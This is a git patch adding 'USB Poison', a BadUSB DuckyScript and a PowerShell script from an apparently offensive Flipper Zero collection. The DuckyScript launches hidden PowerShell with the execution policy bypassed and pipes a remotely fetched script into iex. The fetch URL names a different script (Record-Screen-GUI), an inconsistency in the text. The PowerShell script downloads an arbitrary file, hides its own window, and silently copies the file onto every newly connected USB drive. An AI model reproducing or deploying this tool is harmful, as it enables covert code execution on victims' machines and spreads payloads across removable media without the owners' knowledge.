From 8f1ab125b08512082242ebc3666033396bd482f2 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 12 Jun 2024 13:56:37 +0000 Subject: [PATCH] Add files via upload --- USB-Poison/USB-Poison.txt | 16 ++++++++++ USB-Poison/main.ps1 | 61 +++++++++++++++++++++++++++++++++++++++ 2 files changed, 77 insertions(+) create mode 100644 USB-Poison/USB-Poison.txt create mode 100644 USB-Poison/main.ps1 diff --git a/USB-Poison/USB-Poison.txt b/USB-Poison/USB-Poison.txt new file mode 100644 index 0000000..78b6f54 --- /dev/null +++ b/USB-Poison/USB-Poison.txt @@ -0,0 +1,16 @@ +REM Title: USB Poison +REM Author: @beigeworm +REM Description: This script runs quietly in the background waiting for new USB storage devices. +REM Description: When a new storage device connects, this script will copy a desired file to the root of newly connected drive. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $url = 'YOUR_FILE_URL_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Record-Screen-GUI/main.ps1 | iex +ENTER + diff --git a/USB-Poison/main.ps1 b/USB-Poison/main.ps1 new file mode 100644 index 0000000..086a791 --- /dev/null +++ b/USB-Poison/main.ps1 @@ -0,0 +1,61 @@ +<# ====================== USB POISON ========================== + +SYNOPSIS +This script runs quietly in the background waiting for new USB storage devices. +When a new storage device connects, this script will copy a desired file to the root of newly connected drive. + +USAGE +1. REPLACE the example file URL with your own. +2. Run the script +3. Your desired file will be downloaded to the 'temp' directory +4. When a new USB storage device is connected the file is copied +5. Use Task Manager to exit the script + +#> + +# Replace with your file direct download link +$fileURL = "$url" + +# Hidden Console +$hidden = 'y' + +$filename = Split-Path -Path $fileURL -Leaf +$filepath = "$env:TEMP/$filename" +iwr -Uri $fileURL -OutFile $filepath + + +If ($hidden -eq 'y'){ + Write-Host "Hiding the Window.." -ForegroundColor Red + sleep 1 + $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' + $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru + $hwnd = (Get-Process -PID $pid).MainWindowHandle + if($hwnd -ne [System.IntPtr]::Zero){ + $Type::ShowWindowAsync($hwnd, 0) + } + else{ + $Host.UI.RawUI.WindowTitle = 'hideme' + $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) + $hwnd = $Proc.MainWindowHandle + $Type::ShowWindowAsync($hwnd, 0) + } +} + +while($true){ + + $initialDrives = Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID + while ($true){ + $currentDrives = Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID + $newDrive = $currentDrives | Where-Object { $initialDrives.DeviceID -notcontains $_.DeviceID} + if ($newDrive){ + $drive = Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | Where-Object { $initialDrives.DeviceID -notcontains $_.DeviceID} + $driveletter = ($drive.DeviceID + '/') + Copy-Item -Path $filepath -Destination $driveletter + sleep 1 + break + } + sleep 1 + } + + sleep 1 +} \ No newline at end of file